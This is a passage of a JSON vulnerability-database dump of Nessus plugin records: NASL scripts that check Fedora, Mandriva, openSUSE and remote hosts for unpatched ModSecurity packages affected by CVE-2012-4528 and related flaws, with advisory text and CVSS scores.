(!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"mod_security-2.7.1-3.fc18\")) flag++;\nif (rpm_check(release:\"FC18\", reference:\"mod_security_crs-2.2.6-3.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_security / mod_security_crs\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:10:14", "description": " - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-12-03T00:00:00", "title": "Fedora 17 : mod_security-2.7.1-3.fc17 / mod_security_crs-2.2.6-3.fc17 (2012-18315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2012-12-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:mod_security", "p-cpe:/a:fedoraproject:fedora:mod_security_crs"], "id": "FEDORA_2012-18315.NASL", "href": "https://www.tenable.com/plugins/nessus/63127", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63127);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_bugtraq_id(56096);\n script_xref(name:\"FEDORA\", value:\"2012-18315\");\n\n script_name(english:\"Fedora 17 : mod_security-2.7.1-3.fc17 / mod_security_crs-2.2.6-3.fc17 (2012-18315)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=867424\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/093619.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8afef71f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dc638616\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_security and / or mod_security_crs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security_crs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"mod_security-2.7.1-3.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"mod_security_crs-2.2.6-3.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_security / mod_security_crs\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-01T03:47:37", "description": "According to its banner, the version of ModSecurity installed on the\nremote host is earlier than 2.7.0. It is, therefore, potentially\naffected by a security bypass vulnerability. An error exists related\nto HTTP POST requests and 'Content-Disposition' headers containing\nextra lines that could allow a remote attacker to bypass certain\nfilters and carry out attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the version in the server's banner.", "edition": 26, "published": "2013-07-02T00:00:00", "title": "ModSecurity < 2.7.0 Multipart Request Parsing Filter Bypass", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:modsecurity:modsecurity"], "id": "MODSECURITY_2_7_0.NASL", "href": "https://www.tenable.com/plugins/nessus/67126", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67126);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_bugtraq_id(56096);\n\n script_name(english:\"ModSecurity < 2.7.0 Multipart Request Parsing Filter Bypass\");\n script_summary(english:\"Checks version in Server response header\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application firewall may be affected by a security\nbypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of ModSecurity installed on the\nremote host is earlier than 2.7.0. It is, therefore, potentially\naffected by a security bypass vulnerability. An error exists related\nto HTTP POST requests and 'Content-Disposition' headers containing\nextra lines that could allow a remote attacker to bypass certain\nfilters and carry out attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the version in the server's banner.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2012/Oct/113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/SpiderLabs/ModSecurity/blob/master/CHANGES\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ModSecurity version 2.7.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-4528\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:modsecurity:modsecurity\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"modsecurity_http_version.nasl\");\n script_require_keys(\"www/ModSecurity\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this is ModSecurity\nget_kb_item_or_exit('www/'+port+'/modsecurity');\nversion = get_kb_item_or_exit('www/modsecurity/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/modsecurity/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"ModSecurity\");\n\nif (version == 'unknown') audit(AUDIT_UNKNOWN_WEB_SERVER_VER, \"ModSecurity\", port);\n\nfixed_ver = '2.7.0';\nif (\n version =~ \"^[01]\\.\" ||\n version =~ \"^2\\.[0-6]($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit('www/modsecurity/'+port+'/source', exit_code:1);\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"ModSecurity\", port, version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T11:53:55", "description": "Multiple vulnerabilities has been discovered and corrected in\napache-mod_security :\n\nModSecurity before 2.6.6, when used with PHP, does not properly handle\nsingle quotes not at the beginning of a request parameter value in the\nContent-Disposition field of a request with a multipart/form-data\nContent-Type header, which allows remote attackers to bypass filtering\nrules and perform other attacks such as cross-site scripting (XSS)\nattacks. NOTE: this vulnerability exists because of an incomplete fix\nfor CVE-2009-5031 (CVE-2012-2751).\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct these issues.", "edition": 25, "published": "2012-12-24T00:00:00", "title": "Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2012:182)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528"], "modified": "2012-12-24T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:apache-mod_security", "p-cpe:/a:mandriva:linux:mlogc"], "id": "MANDRIVA_MDVSA-2012-182.NASL", "href": "https://www.tenable.com/plugins/nessus/63331", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:182. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63331);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-2751\", \"CVE-2012-4528\");\n script_bugtraq_id(54156, 56096);\n script_xref(name:\"MDVSA\", value:\"2012:182\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2012:182)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in\napache-mod_security :\n\nModSecurity before 2.6.6, when used with PHP, does not properly handle\nsingle quotes not at the beginning of a request parameter value in the\nContent-Disposition field of a request with a multipart/form-data\nContent-Type header, which allows remote attackers to bypass filtering\nrules and perform other attacks such as cross-site scripting (XSS)\nattacks. NOTE: this vulnerability exists because of an incomplete fix\nfor CVE-2009-5031 (CVE-2012-2751).\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-mod_security and / or mlogc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mlogc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_security-2.6.1-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mlogc-2.6.1-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:26:46", "description": " - complete overhaul of this package, with update to 2.7.5.\n\n - ruleset update to 2.2.8-0-g0f07cbb. \n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneaous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintaned upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. (Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)", "edition": 21, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1336-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528", "CVE-2013-2765", "CVE-2013-1915"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource", "p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-mod_security2", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-640.NASL", "href": "https://www.tenable.com/plugins/nessus/75112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-640.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75112);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\", \"CVE-2013-1915\", \"CVE-2013-2765\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1336-1)\");\n script_summary(english:\"Check for the openSUSE-2013-640 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - complete overhaul of this package, with update to 2.7.5.\n\n - ruleset update to 2.2.8-0-g0f07cbb. \n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneaous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintaned upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. (Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=768293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-08/msg00025.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_security2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"apache2-mod_security2-2.7.5-14.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"apache2-mod_security2-debuginfo-2.7.5-14.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"apache2-mod_security2-debugsource-2.7.5-14.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_security2 / apache2-mod_security2-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:26:46", "description": " - complete overhaul of this package, with update to 2.7.5.\n\n - ruleset update to 2.2.8-0-g0f07cbb.\n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneaous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintaned upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. (Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)", "edition": 21, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1331-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528", "CVE-2013-2765", "CVE-2013-1915"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-mod_security2"], "id": "OPENSUSE-2013-641.NASL", "href": "https://www.tenable.com/plugins/nessus/75113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-641.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75113);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\", \"CVE-2013-1915\", \"CVE-2013-2765\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1331-1)\");\n script_summary(english:\"Check for the openSUSE-2013-641 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - complete overhaul of this package, with update to 